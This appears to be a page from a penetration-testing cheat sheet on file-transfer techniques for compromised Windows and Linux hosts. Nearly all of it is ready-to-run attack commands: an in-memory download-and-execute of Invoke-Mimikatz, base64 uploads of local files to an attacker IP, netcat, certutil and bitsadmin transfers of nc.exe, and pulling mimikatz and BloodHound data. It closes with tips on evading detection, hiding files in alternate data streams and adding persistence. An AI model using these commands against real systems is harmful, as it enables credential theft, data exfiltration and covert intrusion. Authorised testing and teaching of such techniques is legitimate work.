File-transfer

PowerShell Commands

  1. Download a File

    Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1

  2. Execute File in Memory

    IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

  3. Upload a File

    Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

  4. Download with Custom User-Agent

    Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

  5. Base64 Encoded Upload

    $bytes = [System.IO.File]::ReadAllBytes("C:\Temp\file.txt")
$b64 = [System.Convert]::ToBase64String($bytes)
Invoke-WebRequest -Uri http://10.10.10.32/upload -Method POST -Body $b64

Windows Native Tools

  1. Bitsadmin (Deprecated but Still Useful)

    bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

  2. Certutil (Native to Windows for Certificate Management)

    certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

Linux-Based Tools

  1. Wget

    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

  2. cURL

    curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

  3. Python HTTP File Download

import requests
response = requests.get('http://10.10.10.32/nc.exe')
with open('nc.exe', 'wb') as file:
    file.write(response.content)

Other Methods

  1. PHP File Download

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

  1. SCP (Secure Copy Protocol) - Upload

    scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip

  2. SCP - Download

    scp user@target:/tmp/mimikatz.exe C:\Temp\mimikatz.exe

  3. Netcat (Linux/Windows) Send File:

nc -lvp 4444 > received_file

Receive File:

nc <attacker-ip> 4444 < file_to_send

  1. FTP Upload/Download (Interactive)

ftp 10.10.10.32

  1. TFTP (Trivial File Transfer Protocol) Download:

tftp -i 10.10.10.32 GET nc.exe

Upload:

tftp -i 10.10.10.32 PUT nc.exe

  1. SMB (Using SMBClient)

smbclient \\10.10.10.32\share -U username
put file.txt
get file.txt

Extra Tips

  • Bypass Restrictions: Consider using alternative ports, URL encoding, or modifying headers to bypass security restrictions.

  • Evasion Techniques: Use legitimate-looking User-Agents, filenames, or paths to evade detection.

  • Persistence: Combine these methods with scheduled tasks or registry modifications for persistence.

  • File Obfuscation: Encode files in Base64 to evade basic detection.

  • Alternate Data Streams (Windows):

    type nc.exe > file.txt:stream

  • Compression & Encryption: Compress files using zip or 7z with a password.

    7z a -psecret -mhe protected.7z file.txt
PreviousSession Security GuideNextFile-upload-attacks

Last updated